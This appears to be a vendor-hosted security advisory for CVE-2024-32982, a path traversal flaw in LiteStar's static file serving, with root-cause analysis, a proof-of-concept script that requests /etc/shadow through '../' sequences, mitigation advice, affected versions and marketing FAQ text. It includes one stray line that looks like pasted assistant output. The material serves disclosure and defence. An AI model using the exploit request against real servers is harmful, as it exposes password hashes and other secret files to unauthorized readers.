Summary
Local File Inclusion via Path Traversal in LiteStar Static File Serving
A Local File Inclusion (LFI) vulnerability has been discovered in the static file serving component of LiteStar. This vulnerability allows attackers to exploit path traversal flaws, enabling unauthorized access to sensitive files outside the designated directories. Such access can lead to the disclosure of sensitive information or potentially compromise the server.
Details
The vulnerability is located in the file path handling mechanism within the static content serving function, specifically at line 70 in litestar/static_files/base.py.
The function fails to properly validate the destination file path derived from user input, thereby permitting directory traversal. The critical code segment is as follows:
commonpath([str(directory), file_info["name"], joined_path])
Given the variables:
directory = PosixPath('/Users/brian/sandbox/test_vuln/static')
file_info["name"] = '/Users/brian/sandbox/test_vuln/static/../requirements.txt'
joined_path = PosixPath('/Users/brian/sandbox/test_vuln/static/../requirements.txt')
The function outputs '/Users/brian/sandbox/test_vuln/static', incorrectly assuming it is confined to the static directory. This incorrect validation facilitates directory traversal, exposing the system to potential unauthorized access and manipulation.
Proof of Concept (PoC)
To reproduce this vulnerability, follow these steps:
Set up the environment:
- Install with pip the
uvicornandlitestarpackages. - Create a
staticfolder in the root directory of your project and place any file (e.g., an image) in it for testing. - Ensure the static file serving is enabled, which is typically the default configuration.
- Install with pip the
Preparation of the testing environment:
- If using Ubuntu or a similar system, you can use
/etc/shadowwhich contains sensitive password information. If not, create a dummy sensitive file outside the static directory for testing. - Create a
main.pyfile with the following content to configure and run the LiteStar server:
from pathlib import Path from litestar import Litestar from litestar.static_files import create_static_files_router import uvicorn app = Litestar( route_handlers=[ create_static_files_router(path="/static", directories=["static"]), ], ) if __name__ == "__main__": uvicorn.run("main:app", host="0.0.0.0", port=8000)- Run this script with the command
python3 main.pyto start the server.
- If using Ubuntu or a similar system, you can use
Exploit:
- Prepare an exploit script named
exploit.pywith the following Python code to perform the HTTP request without client-side sanitization:
import http.client def send_request(host, port, path): connection = http.client.HTTPConnection(host, port) connection.request("GET", path) response = connection.getresponse() print(f"Status: {response.status}") print(f"Headers: {response.getheaders()}") data = response.read() print(f"Body: {data.decode('utf-8')}") connection.close() send_request("localhost", 8000, "/static/../../../../../../etc/shadow")- Execute this script using
python3 exploit.py. This script uses direct HTTP connections to bypass client-side path sanitization present in tools like curl or web browsers.
- Prepare an exploit script named
Observe:
- The server should respond with the contents of the
/etc/shadowfile, thereby confirming the path traversal vulnerability. - The output will display the status, headers, and body of the response, which should contain the contents of the sensitive file.
- The server should respond with the contents of the
Mitigation Suggestion
To effectively address the Local File Inclusion vulnerability via path traversal identified in the LiteStar application, it is essential to implement robust input validation and sanitization mechanisms. Below are specific strategies focused on managing user inputs and ensuring secure file path handling:
Input Validation and Sanitization:
- Implement rigorous validation of all user-supplied input, particularly file path inputs. This should include sanitizing the input to remove or neutralize potentially harmful characters and sequences such as
../which are used in path traversal attacks. - Use regular expressions to validate file paths against a strict pattern that only matches expected and safe input.
- Implement rigorous validation of all user-supplied input, particularly file path inputs. This should include sanitizing the input to remove or neutralize potentially harmful characters and sequences such as
Path Normalization:
- Normalize file paths before using them in file operations. Functions such as
os.path.normpath()in Python can be used to normalize paths. This method resolves redundant separators and up-level references (../) to prevent directory traversal. - As a reference, consider the approach taken by the Starlette framework in their static file serving feature, where path validation is performed to ensure the requested path remains within the intended directory. For example, see how Starlette handles this with a security check:
This snippet from Starlette's implementation ensures that the constructed file path does not traverse out of the specified directory.if os.path.commonpath([full_path, directory]) != directory: # Don't allow misbehaving clients to break out of the static files # directory. continue
- Normalize file paths before using them in file operations. Functions such as
Comments
Naming Convention:
- From versions 0.X.X through 1.X.X, the package was released under the name "starlite."
- Starting with version 2.0.0 and for all subsequent versions, the package has been rebranded and released under the name "litestar."
Feature Additions and Changes:
- Static Files Support: Introduced in version 0.6.0, adding the capability to serve static files directly from the package.
- Path Validation Update: In version 1.37.0, Starlite modified its approach to validating paths within the static directory. Prior to this version, path validation was managed using the Starlette framework.
Impact
This Local File Inclusion vulnerability critically affects all instances of LiteStar where the server has been configured to serve static files. By exploiting this vulnerability, unauthorized attackers can gain read access to any file that the server process has permission to access. Here are the specific impacts:
Exposure of Sensitive Information:
- The ability to traverse the file system can lead to the exposure of highly sensitive information. This includes system configuration files, application logs, or scripts containing credentials or cryptographic keys. Such information can provide attackers with deeper insights into the system architecture or facilitate further attacks.
Potential for System Compromise:
- If sensitive system or application configuration files are exposed, attackers might be able to use this information to manipulate system behavior or escalate their privileges. For instance, accessing a
.envfile might reveal environment variables used for application configurations that include database passwords or API keys.
- If sensitive system or application configuration files are exposed, attackers might be able to use this information to manipulate system behavior or escalate their privileges. For instance, accessing a
Credential Leakage:
- Access to files such as
/etc/passwdor/etc/shadow(on Unix-like systems) could expose user credentials, which might be leveraged to perform further attacks, such as brute force attacks on user accounts or using stolen credentials to access other systems where the same credentials are reused.
- Access to files such as
Regulatory and Compliance Violations:
- Unauthorized access to personally identifiable information (PII), payment data, or health records could result in breaches of data protection regulations such as GDPR, HIPAA, or PCI DSS. This could not only damage the reputation of the organization but also lead to heavy fines and legal action.
Loss of Trust and Reputation Damage:
- Security incidents, particularly those involving the loss of sensitive data, can significantly damage an organization's reputation. Customers and partners may lose trust, which can impact the business both immediately and in the long term.
Potential for Further Exploitation:
- The initial read access gained through this vulnerability might be used as a stepping stone for more severe attacks. For example, if application source code is accessed, it could be analyzed for further vulnerabilities that might lead to direct exploitation, such as remote code execution.
Here's the revised Mitigation Suggestion section for your vulnerability report, focusing on items 1 and 2, and including a reference to a similar implementation in another project:
Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files. Typical impact: unauthorized file read or write outside the intended directory.
CVE-2024-32982 has a CVSS score of 8.2 (High). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (2.8.3, 2.7.2, 2.6.4, 1.51.16); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
litestar to 2.8.3 or later; litestar to 2.7.2 or later; litestar to 2.6.4 or later; starlite to 1.51.16 or later
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2024-32982? CVE-2024-32982 is a high-severity path traversal vulnerability in litestar (pip), affecting versions >= 2.8.0, < 2.8.3. It is fixed in 2.8.3, 2.7.2, 2.6.4, 1.51.16. Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files.
- How severe is CVE-2024-32982? CVE-2024-32982 has a CVSS score of 8.2 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which packages are affected by CVE-2024-32982?
litestar(pip) (versions >= 2.8.0, < 2.8.3)starlite(pip) (versions >= 1.37.0, < 1.51.16)
- Is there a fix for CVE-2024-32982? Yes. CVE-2024-32982 is fixed in 2.8.3, 2.7.2, 2.6.4, 1.51.16. Upgrade to this version or later.
- Is CVE-2024-32982 exploitable, and should I be worried? Whether CVE-2024-32982 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2024-32982 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2024-32982?
- Upgrade
litestarto 2.8.3 or later - Upgrade
litestarto 2.7.2 or later - Upgrade
litestarto 2.6.4 or later - Upgrade
starliteto 1.51.16 or later
- Upgrade